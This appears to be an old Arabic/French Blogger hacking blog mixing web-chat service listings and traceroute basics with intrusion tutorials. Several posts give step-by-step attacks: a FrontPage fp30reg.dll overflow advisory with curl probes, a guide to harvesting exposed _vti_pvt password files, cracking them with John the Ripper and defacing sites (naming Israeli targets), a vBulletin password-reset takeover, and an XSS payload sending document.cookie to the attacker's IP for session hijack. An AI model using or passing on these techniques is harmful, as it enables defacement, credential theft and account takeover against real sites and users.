يتم التشغيل بواسطة Blogger.

آخر الحلقات عن الفيسبوك

آخر حلقات الويندوز

الاقسام

آخر الحلقات الحصرية

صوت وصورة

أخبار المشاهير

توقيت المغرب

رياضة عالمية

Main Post

أرشيف المدونة الإلكترونية

آخر الحلقات عن الانترنت

آخر حلقات الحماية من الهاكرز

أقسام

Send Quick Massage

الاسم

بريد إلكتروني *

رسالة *

إشترك بالمدونة

الكتاب الرسميون

الدولي

آخر الحلقات عن منتجات جوجل

المشاركات الشائعة

عن الموقع

my

Visitors

الأربعاء، 25 يونيو 2008

vos adresse web sur pc et gsm pour la messagerie instantané IM

bey mr electroman

Meebo & Meebo Rooms

Meebo est un service web based très populaire et depuis sa dernière version (Meebo Rooms) le succès va encore grandir. Totalement en ligne, offrant la fonction vidéos et beaucoup d’options. Le plus important est la robustesse du service qui ne connait pas vraiment de ralentissements.

http://www.meebo.com

Pibb


En comparaison avec la plupart des autres est une version light. Le service permet de créer des chatrooms, d’avoir une liste d’amis et de sauvegarder le contenu des discussions. Il a aussi la particularité d’être compatible avec OpenID.

http://pibb.com/

Tangler

Tangler est un forum en ligne actuellement en beta. L’originalité c’est qu’il permet des conversations en temps réel comparable aux services de chat en ligne. L’impression d’utiliser un forum peut permettre de conquérir un autre public. A noter qu’il propose des fonctions d’édition plus poussées que ses concurrents.

https://www.tangler.com/

Lingr


Nous ne savons pas quel avenir peut avoir ce service, mais il offre l’avantage de la simplicité. Il suffit de choisir un tag dans un nuage, d’entrer dans le chat et de commencer à discuter. Sachez néanmoins que la majorité des conversations sont en japonais.

http://www.lingr.com

Kool IM

koolim

Identique à Meebo, KooLIM aggrège les messageries en une seule page. Il est compatible avec AIM, MSN Messenger, Yahoo! Messenger, ICQ et Jabber.
Comme pour Meebo, il est possible d’ouvrir le chat dans un pop up et comme Meebo la pub a également fait son apparition.

http://www.koolim.com/

Campfire

Orienté vers les professionnels Campfire est un chat classique. Ses qualités reposent sur son intégration à Basecamp, l’archivages des conversations, la facilité d’échange de fichier et d’images.

http://campfirenow.com/

Yahoo! Messenger for the web


Yahoo a constasté le succès des chats en ligne, ils ont donc récemment rendu disponible la version web based de leur client IM. Il fonctionne sur tous les navigateurs, possède un historique complet et propose une longue liste d’émoticons.

http://webmessenger.yahoo.com/

MessengerFX

Comme Yahoo!, Windows Live Messenger dispose d’une version en ligne, celle ci n’est pas une version officielle et les auteurs ne sont pas affiliés à Microsoft. Rapide et efficace.

http://www10.messengerfx.com/

Iminent

On vous en a déja pas mal parlé, IMinent n’est pas vraiment un système de chat puisqu’il s’agit d’un module complémentaire à Windows live messenger et Yahoo!messenger. Il permet aux utilisateurs de s’envoyer en temps réels des Emovids, de courtes séquences vidéos représentant son état d’esprit.
Le service est sorti de beta privée il y a peu et est une initiative française.

http://www.iminent.com/

eBuddy

eBuddy permet d’utiliser AIM, Windows live messenger et Yahoo messenger via une interface en AJAX. Il ne supporte pas Jabber (gtalk) et est parfois lent.

http://www.ebuddy.com/

3bubbles


A la difference des autres services présentés ici (mis à part Meebo), 3bubbles se destine à être utiliser sur le blog via un widget. Ce n’est donc pas un vrai concurrent aux autres services.

http://www.3bubbles.com/

Tworl


Tword propose une manière vraiment originale d’aborder le chat et la messagerie instantanée, tandis que la signature de beaucoup de services correspond à quelque chose du style: “connectez vous à vos amis”, Tworl vous propose exactement l’inverse en vous mettant en contact aléatoirement avec une nouvelle liste d’utilisateurs. L’idée est plutôt sympa mais en aucun cas cela ne peut remplacer une vrai messagerie avec une “vrai” liste de contacts. L’usage est plutôt destiné au “fun”.

http://www.tworl.com/

Mabber

Mabber a l’avantage de fonctionner sur le web et aussi sur mobile. Il supporte AIM, ICQ, MSN, Yahoo Messenger et Gtalk. Une récente version propose le widget de chat que vous pourrez intégrer à votre blog. Vous pourrez également l’utiliser pour recevoir vos news en RSS (Mabber alert)

http://www.mabber.com/

Geesee

Geese est un concurrent direct de 3bubbles et Itzle: il n’offre pas d’espace de chat centralisé mais vous permet de créer un wigdet pour votre blog. L’outil fonctionne avec une multitude de plateforme comme Typepad, Wordpress et même netvibes.

http://www.geesee.com/

Plugoo

Plugoo est un peu un mix de tout. Il fonctionne avec AIM, MSN, Yahoo, Gtal, ICQ et JAbber et vous permet également de créer un tchat pour les visisteurs de votre blog directement depuis n’importe quel client IM. Si vous voulez maintenir une discussion avec un visiteur de votre site/blog cet outil est vraiment plus intéressant qu’un simple chat box intégré qui indique toujours que vous êtes “offline”

http://www.plugoo.com

RadiusIM

Cette startup basé à Manhattan offre un service de IM qui combine un chat en ligne avec Google Maps, vous permettant ainsi de chatter avec des personnes de votre localité. vous pourrez agrégrer plusieurs pseudos IM de différentes plateformes. Les logins sont sauvegardés par Radius IM qui vous permet ainsi de ne pas avoir à retaper tous vos passwords/logins. (ils viennent de lever 500.000$ auprès de fonds d’investussement la semaine dernière)

http://www.radiusim.com

Itzle

Légèrement différent des autres services IM: Itzle vous permet de chater avec d’autres utilisateurs sur des pages webs par l’intermédiaire d’un avatar. pas de download nécessaire mais juste un “bookmarklet” sur lequel il faut cliquer pour faire apparaitre votre avatar. On trouve le service innovant mais on doute encore de son utilité.

http://www.itzle.com

Gabbly

Gabbly est un chat box en ajax pour blogs et sites web. Il vous permet d’avoir un chat sur votre propre domaine (avec une extension) en y incluant un iFrame.

http://www.gabbly.com

ZohoChat

Un des outils de la suite office Zoho, Zoho chats vous permet de chater avec d’autres utilisateurs sur votre site/blog. La fonction embed utilise un iFrame (qui ne marche donc pas sur toutes les plateformes/sites), il manque également la fonctionnalité d’aggrégation des différents pseudos des différents services de messagerie. Ceci étant dit c’est un moyen super sumple pour mettre en place un chat surtout si vous utilisez couramment la suite Zoho.

http://www.zohochat.com

الاثنين، 23 يونيو 2008

ثغرة في نظام frontpage extension

mr electroman









COMMAND



FrontPage Server Extensions



SYSTEMS AFFECTED



FrontPage Server Extensions; IIS 4, 5



PROBLEM



There has been several issues with Front Page Server Extensions.

One of them was reported by Internet Security Systems Security

Alert. ISS X-Force is aware of a serious vulnerability that may

allow remote attackers to launch Denial of Service (DoS) attacks

against, or compromise Microsoft Internet Information Server

(IIS) installations. This vulnerability exists in the Visual

Studio Remote Application Deployment (RAD) component of FrontPage

Server Extensions.



Microsoft FrontPage is a Web site design and management

application. The FrontPage Server Extensions (FPSE) package is

included in IIS versions 4.0 and 5.0 to help integrate FrontPage

with IIS. IIS servers may be vulnerable if the Visual Studio RAD

component of FPSE is installed. This component allows Web site

designers who use Microsoft InterDev to actively register and

unregister COM components on the IIS server.



The Visual Studio RAD component includes a vulnerable Dynamic Link

Library (DLL), fp30reg.dll. This DLL does not properly parse long

arguments. Attackers may supply the DLL with an overly long

request and may be able to run arbitrary code or bring down the

server. Any commands executed on the server are executed under

the IUSR_machinename security context, and in certain

circumstances under the System context.



Following was by NSFOCUS Security Advisory SA2001-03. NSFOCUS

security team has found also a buffer overflow vulnerability in

Microsoft FrontPage 2000 Server Extension, which can be exploited

to execute arbitrary code by a remote attacker. Microsoft

FrontPage 2000 Server Extension has a Dynamic Link Library (.DLL)

File: "fp30reg.dll" that exists a buffer overflow vulnerability.

When fp30reg.dll receives a URL request that is longer than 258

bytes, a stack buffer overflow will occur. Exploiting this

vulnerability successfully, an attacker can remotely execute

arbitrary code on the server running MS FPSE 2000.



In case that fp30reg.dll receives an invalid parameter(method),

it will return an error message:



"The server is unable to perform the method [parameter provided by the user] at this time"



This error message will be saved in a fixed length stack buffer.

fp30reg.dll calls USER32.wsprintfA() to form return message.

Because there is no checkup for the length of data supplied by

the user, the destination buffer can be overwritten. An attacker

can rewrite some important memory address like exception structure

or saved EIP to change program flow.



Format string used by USER32.wsprintfA() is:



HTTP Error 501

NOT IMPLEMENTED



The server is unable to perform the method %s at this time.



It is also saved in stack and its address is at (target buffer

address + 256 bytes), so the format string will be rewritten when

the overflow occurs. The attacker should manage to finish

copying. If an attacker overwrite the buffer with random data,

IIS service will fail. In this case, IIS 5.0 can be automatically

self-restarted, but IIS 4.0 needs to be restarted manually.



Exploiting this vulnerability successfully, an attacker can obtain

the privilege of IWAM_machinename account in IIS 5.0 or Local

SYSTEM account in IIS 4.0 by default.



There is a copy of fp30reg.dll in another directory:



Program FilesCommon FilesMicrosoft SharedWeb Server Extensions bin



whose name is fp4areg.dll.



Exploiting some other vulnerabilities like unicode bug, an

attacker will be able to access this file.



Overflow won't occur in case that the provided parameter has only

258 bytes:



$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x258'`



HTTP Error 501

NOT IMPLEMENTED



The server is unable to perform the method AAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAA
at this time.



In case that it is longer than 258 bytes, an buffer overflow will

occur:



$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x259'`



ErrorThe remote procedure call

failed.



There is a proof of concept code for this issue:



http://www.nsfocus.com/proof/fpse2000ex.c



SOLUTION



ISS X-Force recommends that all Web site administrators review the

appropriate IIS Security Checklist from Microsoft, and verify

that their IIS Web servers have been configured securely. These

documents outline how to correctly configure an externally facing

IIS Web server. IIS servers that have been configured securely,

using the Checklists, are not vulnerable to many of the recent

and widely publicized remote IIS exploits.



The IIS Security Checklists are available here:



http://www.microsoft.com/technet/security/iischk.asp

http://www.microsoft.com/technet/security/iis5chk.asp



Patch for Microsoft Windows NT version 4.0:



http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038



For Microsoft Windows 2000 Professional, Server and Advanced

Server:



http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30727



For more information on this vulnerability, please refer to the

Microsoft Security Bulletin at:



http://www.microsoft.com/technet/security/bulletin/MS01-035.asp



Basically, installing MS01-035 causes the IIS MMC to close when

you click on the server extensions tab under Windows 2000

Advanced Server on SP2 (with all current hotfixes). Uninstalling

MS01-035 fixes the problem, but opens up the security hole. When

the new patch is available, MS will re-release their bulletin.

السبت، 21 يونيو 2008

ثغرة Front Page



الكاتب : ^SpY^



الاختراق عن طريق ثغرة Front page



________________________________________



أولا :

.......قبل قرائتك للموضوع يجب أن يكون لديك فكرة ولو بسيطة عن :

1- Front page Server Extensions

2- ثغرات الفرونت بيدج و ليس كيفية استعمالها

3- الموضوع للمبتدئين فاذا لم تكن مبتدأ ... فأنصحك بعدم تضييع وقتك معه



نخش في الموضوع:

طبعا ثغرات الفرونت بيدج تكون موجودة في الأنظمة التي يدعم سيرفراتها الFront page , وهذه الثغرات تمكن المخترق من الوصول لملف

الuser name و الpassword الخاص بالAdmin بتاع الموقع .

ولعلك تتسائل ما هذه الملفات ؟ ... حسننا تكون الملفات على هذا النحو والتي تحتوي علىuser name و password الخاص بالAdmin :

Administrator.pwd

Author.pwd

Service.pwd وغالبا تكون الكلمة السرية في هذا المجلد , والذي هو متفرع من _Vti_pvt .



.....طبعا كلكم عارفين الحجات دي .. بس ممكن بعضكم ما قدرش يخترق بيها عشان مافهمش كويس من دروس غير .......المهم أنا هاشرحلكم درس عملي من A to Z للاختراق عن طريق الثغرة دي .

كنا قلنا ان الثغرة غالبا بتكون هنا www.site.com/_vti_pvt/_service.pwd , طب ممكن واحد يقول طب أنا جربت اكتب كدة مع مواقع كتيرة و بيطلعلي error أو Forbidien .....المهم ممكن الAdmin يكون عامل security شوية على الملف ده ..... طيب عشان تجرب وتنفذ هتتبع التالي:

ادخل على الموقع دة

www.altavista.com

وبعدين اكتب في الSearch الكلام دة Link:_Service.pwd أو اكتب Link:_vti_pvt/_service.pwd

المهم هيطلعلك نتايج بالهبل و معظمها تعاني من الثغرة دي , مثال http://www.soi-rp.com/_vti_pvt/ ادخل هنا , هيظهرلك صفحة وفيها الحجات دي :







Parent Directory

-





-











.......... المهم خش على Service.pwd هتلاقي حاجة زي كدة : # -FrontPage- orechron:zjcZSlimQERyw

orechron ده الuser name

zjcZSlimQERyw ودي الpassword بس ماتجربهاش عشان دي مشفرة ....طيب عشان تفكها هتحتاج لjohn the ripper ممكن تحملها من هنا openwall.com المهم لما تحمل الأداة هتلاقي مجلدين run و doc والمهم هوه run بالنسبة لطيرقة العمل هاتكون كالتالي .... هاتلاقي ملف عندك في الجهاز اسمو command موجود في System32 انسخه وضعه في المجلد run .... وبعدين تحطorechron:zjcZSlimQERyw في ملف txt وليكن باسم password .....طيب افتح command واكتب الامرده <john -i:all password.txt

وبعد مايخلص البرنامج هتلاقي الpassword الحقيقية هنا john.pot

كدة خلاص ... وصلنا للختام وهوه انك تصمم صفحة بالفرونت بيدج وتكتب فيها Hacked by ^SpY^

وتعمل pubish web هايطلب username و password هاتكتبهم و..... و مبروك عليك الاختراق .



و عموما أنصحكم بالبحث هنا عشان دي مواقع يهوديه تبحث بطريقة الSpiders يعني Random Hacking :

achla.co.il

maven.co.il

iguide.co.il

____________________________

طرق معرفة واختراق المواقع التي تدعم FrontPage

كثر منا يعلم ان هذه الثغرة خاصة بنظام// NT - Unix



1-وسف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpage أم لا؟



بعدة طرق ولن أذكر إلا الأسهل:



- بالذهاب إلى موقع netcraft

http://www.netcraft.com/

وكتابة اسم الموقع وبعد البحث سوف يظهر

mod_frontpage/x

x=(رقم الإصدار الخاص بالفرونت بيج)

- عن طريق إضافة جملة

vti_inf.html_/

بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/

نضيف الجملة ليصبح بهذه الطريقة

http://www.almodammer.com/_vti_inf.html

وبعدها اضغط Enter

وراح يطلعلك في أول الصفحة هذه الكلمة

Frontpage Configuration Information

أي قد تم تثبيت مجلدات وبرامج الفرونت بيج

- وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا

بإضافة

vti_cnf_/

بعد عنوان الموقع كهذا المثال:

http://www.almodammer.com/_vti_cnf

واضغط زر الفأرة الأيمن واختار

source المصدر

وابحث عن

vti_generator:Programe

حيث

Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به



--------------------------------------------------



2-ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟

بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك

يعني وعلى سبيل المثال

http://www.almodammer.com/

يدعم fontpage طيب نذهب إلى ملف vti_pvt_

كذا يعني

http://www.almodammer.com/_vti_pvt

وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:

=============

Adminstrator.pwd

Adminstrators.pwd

Service.pwd

Users.pwd

User.pwd

Author.pwd

=============

ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود

username : passwd

اسم المستخدم والباسوورد

يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password

وهذا مضمون الملف

operator:hi9LHn9wAMuKM

حيث اسم المستخدم : operator

الباسوورد المشفرة هي:hi9LHn9wAMuKM



ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره

وهذا يتم ببرامج كثير

=(Crack Jack)=

=(John The Ripper)=



راح نستخدم الأفضل والأكثر تداولا وهو

John The Ripper

لتحميل البرنامج من هذا الموقع::

http://www.openwall.com/john



كيف تفك التشفير بهذا البرنامج



أول شي تروح تنقل البرنامج إلى مجلد

:c

بعدين تفتح مجلد RUN

وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها

إذهب إلى

ابدأ start

تشغيل run

اكتب الأمر

command

اضغط على Enter وبعدها راح يفتح

إطار الـDoS

اذهب إلى مجلد RUN

وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر

..cd

حتى توصل

<:c

بعدين اكتب

cd john

اضغط على Enter

وراح يظهر لك بهذا الشكل

<c:john

واكتب

cd RUN

وبتدخل المجلد ليصبح بهذه الطريقة

<c:/john/RUN

ألحين نكتب أوامر برنامج John The Ripper

وهي

====

john -i:all passd.txt

--------------------------

يبحث لك عن جميع الأنواع والاحتمالات



====

john -i:Alpha passwd.txt

----------------------------------

يبحث عن الأحرف الصغيرة



====

john -i: Digits passwd.txt

----------------------------------

يبحث عن الأرقام



====

john -i:single passwd.txt

---------------------------------

أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم



--------------------------------------------------------------------------------

وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى

john.pot

الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها

--------------------------------------------------------------------------------



إنت ألحين مستريح عندك username والـpassword

وش بقالك ؟!!

يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/





frontpage

بعدين

file وتذهب إلى

open web وتضيف

الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك



من FTP

وعليك ببرامج الـFTP المنتشرة

كالـws-ftp

والـpro ftp

والمزيد ...

ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك



======================================



وألحين أكيد تبون تجربون على موقع أقولكم روحوا google

http://www.google.com/

واكتبوا في إطار البحث

vti_pvt_/

وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة



وعندك محرك بحث

http://www.altavista.com/

تكتب في محرك البحث

link:service.pwd

أو..

link:adminstrators

وغيرها من الملفات الاحتمال وجود password فيها

الجمعة، 20 يونيو 2008

DETECTER VOTRE ADRESSE IP

bey mr electroman
ouvrer bloc note puis copier coller ce code la et enregister en format .html exepmle index.htm

الخميس، 19 يونيو 2008

الأربعاء، 18 يونيو 2008

ثغرة في Hyper Terminal في نظم Msn

Electroman please your attention

COMMAND

HyperTerminal

SYSTEMS AFFECTED

Win2000 (all versions), Me, 98 and 98SE

PROBLEM

The USSR Team has found a buffer overflow in the HyperTerminal
telnet client, which is in the code that processes the Telnet
URL's, that can enable an attacker to execute arbitrary code on
another user's system. If a user opens an mail containing HTML
and also contains a malformed Telnet URL a buffer overrun will
enable the creator of the mail to cause arbitrary code to be
runned on the user's system.

Example:

telnet://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa/

The other resides in a section of the code that processes session
files - files that enable HyperTerminal users to specify session
parameters such as the connection method and the destination
host. If a user opened a session file that contained a particular
type of malformed information, it would trigger the buffer
overrun.

SOLUTION

Microsoft has re-released original bulletin in May 2001 to inform
customers of the availability of an updated set of patches to
address both the original and a second vulnerability identified
in HyperTerminal. Information about the second issue is discussed
in the PROBLEM section above.

A patch is available to fix this vulnerability. Please read the
Security Bulletin:

http://www.microsoft.com/technet/security/bulletin/ms00-079.asp

for information on obtaining this patch.

الثلاثاء، 17 يونيو 2008

ثغره تخترق نصف المواقع ونصف منتديات النت

هذا الملخّص غير متوفِّر. يُرجى النقر هنا لعرض المشاركة.

الاثنين، 16 يونيو 2008

طريقة اختراق المنتديات

طريقة اختراق المنتديات


الكاتب : لا اعرف عنه اى شئ


اختراق المنتديات بس بمنتديات vb

. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

أو العنوان التفصيلي التالي :
http://URL/memberlist.php

URL = العنوان المستضيف للمنتدى

مثل = - .com

4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

http://URL/member.php?soitgoe68e45u...info&userid=266

هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

http://URL/member.php?soitgoe68e45u...etinfo&userid=1

العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

http://URL/member.php?action=login&...VALI...39;').'

العنوان هذا ستقوم بتغيير الكلمات التالية

URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .

8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php

ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

بالطيع ستظهر لك الصفحة التعيسة التي تقول :



you typed in the wrong password


9. بكل بساطة أضغط على

نسيت كلمة السر
forgot password

والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى

الأحد، 15 يونيو 2008

اختراق منتديات الـــ vBulletin

بسم الله الرحمن الرحيم

يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
" أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...

---------
مقدمة :
---------

الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط

ملاحظة : هذه الطريقة لسيت للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .


----------
الثغرة :
---------

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
document.write('<img
src="http://my_ip_address/'+document.cookie+'">';


مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb







ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54







20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

------------
الحل
-----------

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة فاذا وضعت او او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .

تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .


السريفر الشخصي

http://belnet.dl.sourceforge.net/so...ptriad2-2-1.exe
هذا سريفر الاباتشي

السبت، 14 يونيو 2008

Imaginer je réalise voila mr elctroman

exclusivités

après des longes recherches pour avoir une stable connections gprs en passant pare les sites comme meebo https://meebo.com ou bie https://imo.com en réaliser notre objectif et en vous présent pour la premier fois et en exclusivités centova la messagerie instantanées de rêve
https://cetanova.net présenter par mr electroman alors dit-e- merci !!!! :D

الجمعة، 13 يونيو 2008

imedia free links ---imedia sites gratuits---

voila une collection des sites web es marche a 100% avec imedia présenter par electroman

wap.meditel.ma.wapamp.com/users9/0katana

wap.meditel.ma.www.goalzz.com

wap.meditel.ma.wap.esato.com/xhtml

wap.meditel.ma.wanawap.com

wap.meditel.ma.waptrick.com

wap.meditel.ma.gamawap.com

wap.meditel.ma.www.3gforfree.com/mobile

wap.meditel.ma.mobile.itsmy.com/umts/index.php3

wap.meditel.ma.dejavuwap.com/xhtmlcommunity/index

wap.meditel.ma.m.radar.net

wap.meditel.ma.m.taptap.net

wap.meditel.ma.wap.gamoku.com

wap.meditel.ma.www.4shared.com

wap.meditel.ma.fotochatter.com/index.php

wap.meditel.ma.m.vtap.com

wap.meditel.ma.ringermobile.com

تعرف على

Traceroute


الأمر Traceroute وهو من أوامر الدوس ويستخدم لتتبع المسار حتى الوصول الى العنوان او الموقع المطلوب تتبع المسار له.

فكره تتبع المسار قائمه على فكره بسيطة وهي تزويد حزمه البيانات المرسله من الحاسب بخانه تسمى (Time-to-live) او تختصر بـ TTL و المقصود بها زمن الحياه للحزمة. يوضع في تلك الخانه رقم على سبيل المثال (3) و هذا يعني ان الحزمة ستعيش ثلاثه قفزات (Router) او خادم (Server) خلال تجولها عبر الشبكه.


الذي يحدث كالتالي:
لنسمي النقطة التي يكون فيها محول او خادم في الشبكه بنقطة التوزيع.
يقوم الحاسب بأرسال الحزمة و فيها محدد عمرها برقم وهو TTL عند وصول الحزمة لنقطة التوزيع الأولى (للمحول الأول في الشبكه (Roter) او الخادم) تقوم نقطة التوزيع بتنقيص هذا الرقم بمقدار واحد ثم ترسل الحزمة للنقطة التاليه.
عندما تصل الحزمة لنقطة توزيع بحيث يكون عمر الحزمة صفر بعد انقاص واحد منها ترسل نقطة التوزيع رد لمصدر الحزمة (حاسبك) تخبره عن موت الحزمة (اي توقفها عند تلك النقطة) و ضمن الرد تكون هناك المعلومات.
من الضروري وضع عمر للحزمة و الا ستعج الشبكات بحزم تائه تتنقل من نقطة الى نقطة بدون هدى.

ماذا يحدث عند استخدام الأمر Traceroute ؟
يقوم الحاسب بوضع عمر الحزمة 1 ثم يرسلها فيصله الرد من نقطه التوزيع الأولى (بالعزاء).
فيقوم بارسال الحزمة مرة أخرى لكن بعمر يساوي 2 و بذلك يحصل على رد النقطة الثانيه. و يكرر العمليه حتى يصل الى العنوان فيقوم الحاسب المقصود بالرد من اي منفذ مفتوح لديه.

طريقة استخدام الأمر Traceroute

من نافذه الدوس أكتب الأمر التالي و سنستخدم موقع www.linux.org
او يمكن استخدام رقم تعريف الشبكة IP
C:> tracert 198.182.196.56


لأيقاف امر التتبع أضغط (Ctrl+C)

لحفظ نتيجة التتبع في ملف أضف
tracert www.pmail.com > tracert.txt
ELectroman

أذا رغبت في اضافه بيانات تتبع عدة مواقع في نفس الملف أضف
tracert www.rpmfind.net > tracert.txt

الخميس، 12 يونيو 2008

تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت

و سيتناول الموضوع التالي:-
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
أ- استخدام الاداه whois من سطر اوامر لينكس (افضل توزيعه redhat 7.2 )
ب- ملقمات whois الهامه علي مستوي الانترنت
ج- استخدام الاداه sam spade علي ويندوز
د- استخدام الاداه traceroute من سطر اوامر لينكس و الاداه tracert في ويندوز

2 - تقفي اثر الشبكه الداخليه و اسماء نطاقتها
أ-استخدام الاداه nslookup من سطر اوامر لينكس او من سطر الاوامر في ويندوز 2000

3 - معرفه نوع نظام التشغيل
